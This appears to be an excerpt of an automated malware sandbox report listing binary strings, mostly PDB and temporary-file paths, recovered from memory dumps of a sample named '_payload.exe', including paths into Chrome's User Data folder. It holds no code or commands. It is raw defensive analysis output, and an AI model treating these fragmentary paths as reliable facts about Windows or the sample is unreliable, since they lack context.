                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\h source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288044780.00000000042E0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\RT source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333662373.0000000004622000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\k source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245575111.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004181000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\S source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error? source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\bat\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220728599.0000000003CC9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.vapo+ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220259603.00000000041F7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\} source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289217814.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288830631.0000000003CD1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2320944072.00000000042C9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\q source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\wy\ Data source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AppData\ation Data\Temp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304875580.00000000041E3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304461865.00000000041A8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305780376.00000000041EF000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288915602.0000000004171000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289842749.0000000004191000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\_ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2314858413.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309490002.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309043615.00000000041B0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ta\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969857893.0000000003CC8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969596847.0000000003CC2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\y6 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.00000000044D3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305412296.00000000044EB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316052505.000000000419F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309670464.000000000419D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309087828.000000000419A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\pCl source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020128101.0000000003D19000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019336815.0000000003D05000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020095647.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019923625.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220586448.0000000003D01000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220855829.0000000003D07000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorogFile_October_3_2023__13_9_20.txt source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2310492810.0000000003CAE000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305412296.000000000454A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304545377.000000000454A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache\yewy\load_prod.pdb\U" source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269073455.000000000415B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ft.Wi source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288881573.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279635159.0000000003D06000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280141938.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288254715.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269368063.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268652417.0000000004181000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2325989468.0000000004682000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328255306.000000000468A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333695957.000000000468A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020128101.0000000003D19000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019336815.0000000003D05000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020095647.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019923625.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\.pdb\gM source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2325989468.0000000004682000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328255306.000000000468A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328365004.00000000046AB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281607594.0000000004555000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\te\0 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288044780.0000000004301000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280863089.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288336972.000000000430A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282294702.00000000042FE000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289471959.0000000004311000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\63\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\om source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289371112.00000000042A4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304731023.00000000042A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\u source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2314858413.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309490002.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309043615.00000000041B0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.vapo* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb/ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220619290.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ry\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\a\<o source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316052505.000000000419F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309670464.000000000419D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309087828.000000000419A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\CH source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304673578.000000000455B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304545377.000000000454A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969857893.0000000003CC8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969596847.0000000003CC2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289329759.0000000004202000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\} source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004211000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281094654.0000000004211000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004203000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ICE source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\BjA source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2310310548.0000000004323000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2308898477.000000000431A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304397564.000000000431A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279774286.0000000004343000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.000000000433C000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271963806.0000000004323000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\nes\L3 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220619290.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245981120.0000000003CE7000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245017706.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp
